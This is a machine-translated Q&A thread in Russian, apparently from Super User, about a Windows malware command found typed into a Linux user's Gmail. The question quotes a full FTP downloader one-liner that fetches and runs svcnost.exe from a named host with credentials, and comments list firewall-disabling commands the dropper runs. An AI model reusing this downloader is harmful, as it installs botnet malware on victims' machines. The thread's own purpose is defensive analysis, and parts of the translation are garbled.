Вопрос: Как определить, был ли взломан мой Linux-компьютер?


Мой домашний ПК обычно включен, но монитор выключен. Сегодня вечером я вернулся с работы и нашел, что выглядит как попытка взлома: в моем браузере мой Gmail был открыт (это был я), но он был в режиме компоновки со следующим в TO поле:

md / c echo open cCTeamFtp.yi.org 21 >> ik & echo user ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & exit   эхо

Это выглядит как код командной строки Windows для меня, и md начало кода в сочетании с тем фактом, что Gmail находится в режиме компоновки, делает очевидным, что кто-то пытался запустить cmd команда. Я думаю, мне повезло, что я фактически не запускаю Windows на этом ПК, но у меня есть другие, которые это делают. Это первый случай, когда что-то подобное произошло со мной. Я не гуру Linux, и в то время я не запускал никаких других программ, кроме Firefox.

Я абсолютно уверен, что я не писал этого, и никто другой не был физически на моем компьютере. Кроме того, я недавно изменил свой пароль Google (и все мои другие пароли) на что-то вроде vMA8ogd7bv поэтому я не думаю, что кто-то взломал мою учетную запись Google.

Что сейчас произошло? Как кто-то нажал клавиши на моем компьютере, когда это не старая машина Windows бабушки, которая уже много лет работает с вредоносными программами, но недавно установила новую установку Ubuntu?

Обновить:
Позвольте мне затронуть некоторые вопросы и вопросы:

  • Я в Австрии, в сельской местности. Мой маршрутизатор WLAN работает WPA2/PSK и средне-сильный пароль, который отсутствует в словаре; должен был быть грубой силой и менее чем в 50 метрах отсюда; маловероятно, что его взломали.
  • Я использую USB-проводную клавиатуру, поэтому снова очень маловероятно, что кто-то может находиться в радиусе действия, чтобы взломать его.
  • В то время я не использовал свой компьютер; когда я был на работе. Это монтируемый на ПК компьютер с неттопом, поэтому я редко выключаю его.
  • Машина работает всего два месяца, работает только Ubuntu, и я не использую странное программное обеспечение или не посещаю странные сайты. Это главным образом Stack Exchange, Gmail и газеты. Нет игр. Ubuntu настроен на обновление.
  • Я не знаю, какой сервис VNC работает; Я, конечно, не установил и не включил его. Я также не запускал никаких других серверов. Я не уверен, что в Ubuntu по умолчанию работает?
  • Я знаю все IP-адреса в активности аккаунта Gmail. Я уверен, что Google не был входом.
  • Я нашел Просмотр файлов журналов, но я не знаю, что искать. Помогите?

Я действительно хочу знать, и что действительно заставляет меня чувствовать себя небезопасным, это: как может кто-нибудь из Интернета генерировать нажатия клавиш на моей машине? Как я могу предотвратить это, не имея об этом никакой информации? Я не Linux-разработчик, я отец, который сменил Windows на 20 лет и устал от этого. И всего через 18 лет, когда я был в сети, я никогда не видел никаких попыток взлома, так что это ново для меня.


126
2018-04-20 18:24


Источник


Кто-нибудь еще имел доступ к вашему компьютеру, или у вас есть очень старая беспроводная клавиатура? Кроме того, Ubuntu имеет встроенный сервер VNC. Если это активно, случайный скрипт где-то мог подключиться и предположил, что это компьютер с Windows, посылая нажатия клавиш WIN + R, cmd ...... - TuxRug
@torbengb: Ваш пост действительно пугает меня... - Mehrdad
Есть ли в вашей беспроводной сети какие-либо другие компьютеры? Если нарушитель нарушил их это обеспечит ему «вход» в вашу локальную сеть, что может привести к взлому окна Ubuntu различными способами. - CarlF
@muntoo ... и, конечно же, вы нигде не писали нигде и не используете какое-либо приложение для управления ими, верно? Давайте не будем начинать сбрасывать пароли; хотя бы мой пароль не password :-) - Torben Gundtofte-Bruun
У тебя есть кот? - Zaki


Ответы:


Я сомневаюсь, что вам есть о чем беспокоиться. Скорее всего, была атака JavaScript, которая пыталась сделать диск скачать, Если вас это беспокоит, начните использовать NoScript а также Adblock Plus Дополнения Firefox.

Даже если вы посещаете надежные сайты, вы небезопасны, потому что они запускают код JavaScript от сторонних рекламодателей, которые могут быть вредоносными.

Я схватил его и провел в виртуальной машине. Он установил mirc, и это журнал состояния ... http://pastebin.com/Mn85akMk

Это автоматическая атака, которая пытается заставить вас скачать mIRC и присоединиться к бот-сети, которая превратит вас в спамбот ... Он подключил мою виртуальную машину и подключился к нескольким удаленным адресам, одним из которых является autoemail-119.west320.com,

Запустив его в Windows 7, мне пришлось принять приглашение UAC и разрешить ему доступ через брандмауэр.

Кажется, что есть тонны отчетов этой точной команды на других форумах, и кто-то даже говорит, что торрент-файл пытался выполнить ее, когда она была закончена загрузка ... Я не знаю, как это возможно.

Я не использовал это сам, но он должен быть в состоянии показать вам текущие сетевые подключения, чтобы вы могли видеть, связаны ли вы с чем-то вне нормы: http://netactview.sourceforge.net/download.html


66
2018-04-20 18:41



Er, почему все комментарии (даже очень которые обнаружили, что сценарий попытался открыть cmd окно) удален !? - BlueRaja - Danny Pflughoeft
Буду ли я быть в безопасности от такого рода нападений, если бы начал использовать uBlock Origin? - RobotUnderscore


я согласен с @ jb48394 что это, вероятно, эксплойт JavaScript, как и все остальное в наши дни.

Тот факт, что он пытался открыть cmd окно (видеть Комментарий @ torbengb) и запускать вредоносную команду, а не просто загружать троянец незаметно в фоновом режиме, предполагает, что это использует некоторую уязвимость в Firefox, которая позволяет ему вводить ключевые штрихи, но не запускать код.

Это также объясняет, почему этот эксплойт, который был явно написанный исключительно для Windows, также будет работать в Linux: Firefox запускает JavaScript одинаково во всех ОС  (по крайней мере, он пытается :)), Если это вызвано переполнением буфера или аналогичным эксплойтом, предназначенным для Windows, это просто разрушило бы программу.

Что касается того, откуда появился код JavaScript - вероятно, вредоносная реклама Google (цикл рекламы в Gmail в течение дня), Это не будет  быть    первый  время,


41
2018-04-20 21:52



Хорошие ссылки. - kizzx2
FYI для скиммеров, последняя «ссылка» на самом деле состоит из пяти отдельных ссылок. - Pops
Было бы очень шокирующим, если бы это был эксплойт Javascript, так как мой Firefox обычно остается открытым в течение нескольких дней. Однако вам нужно вызвать специальный API для отправки ключей в другую систему под Windows и, возможно, другого системного вызова (если существует) под Linux. Поскольку отправка нажатий клавиш не является нормальной работой Javascript, я сомневаюсь, что Firefox выполнит кросс-платформенный вызов для этого. - billc.cn
@ billc.cn: Я считаю, что запись в буфер клавиатуры PS / 2 работает одинаково независимо от операционной системы, - BlueRaja - Danny Pflughoeft


я нашел аналогичная атака на другой машине Linux. Кажется, это какая-то команда FTP для Windows.


12
2018-04-20 18:36



Точнее, он загружает и запускает файл ftp://ccteam10:765824@cCTeamFtp.yi.org/svcnost.exe с помощью Windows ftp инструмент командной строки. - grawity
нашел его на пастебине тоже pastebin.com/FXwRpKH4 - Shekhar
здесь информация о сайте whois.domaintools.com/216.210.179.67 - Shekhar
Это пакет WinRAR SFX, содержащий переносимую установку mIRC и файл под названием «DriverUpdate.exe». DriverUpdate.exe выполняет (по крайней мере) две команды оболочки: netsh firewall отключен opmode а также taskkill / F / IM VCSPAWN.EXE / T Он также пытается (я думаю) добавить die-freesms-seite.com в доверенную зону Internet Explorer и прокси-сервер. - Andrew Lambert


Это не отвечает на весь ваш вопрос, но в файле журнала просматриваются неудачные попытки входа в систему.

Если в вашем журнале более пяти неудачных попыток, кто-то попытался взломать root, Если есть успешная попытка входа в систему root в то время как вы были вдали от своего компьютера, ИЗМЕНИТЬ ВАШ ПАРОЛЬ НЕМЕДЛЕННО !! Я имею в виду ПРАВО СЕЙЧАС! Предпочтительно что-то буквенно-цифровое и около 10 символов.

С сообщениями, которые вы получили ( echoкоманды), это действительно звучит как незрелый скрипт kiddie, Если бы это был настоящий хакер, который знал, что он делает, вы, вероятно, все равно не узнаете об этом.


5
2018-04-21 04:13



Я согласен, что это, очевидно, очень дилетантски. По крайней мере, они не должны были эхо, которым ты владел в конце. Заставляет меня задаться вопросом, были ли когда-нибудь какие-либо «настоящие хакеры»? Или, может быть, я спрашиваю, сколько? - Torben Gundtofte-Bruun
@torgengb: если команда была запущена в командной строке Windows, вы не увидели бы эхо (из-за &exit) - BlueRaja - Danny Pflughoeft


whois отчеты west320.com принадлежат Microsoft.

UPnP а также дешевое вино (Система -> Настройки -> Удаленный рабочий стол) в сочетании со слабым паролем Ubuntu?

Вы использовали какие-либо нестандартные репозитории?

DEF CON каждый год имеет конкурс Wi-Fi относительно того, как далеко можно достичь точки доступа Wi-Fi - последнее, что я слышал, было 250 миль.

Если вы действительно хотите испугаться, посмотрите на скриншоты центра команд-n-control Зевс ботнет, Никакая машина не безопасна, но Firefox в Linux безопаснее остальных. Еще лучше, если вы запустите SELinux,


-1
2018-04-20 21:59



Автор этого эксплойта явно не собирался запускать это в Linux, поэтому я сомневаюсь, что он имел какое-либо отношение к уязвимой утилите gnome или слабому паролю (также, ОП уже упоминал, что у него есть безопасный пароль) - BlueRaja - Danny Pflughoeft
На самом деле, он не упоминает пароль Ubuntu, просто gmail и беспроводную кодовую фразу. Малыш, выполняющий метаплан, может даже не знать о Linux, он просто видит VNC. Это, скорее всего, атака javascript. - rjt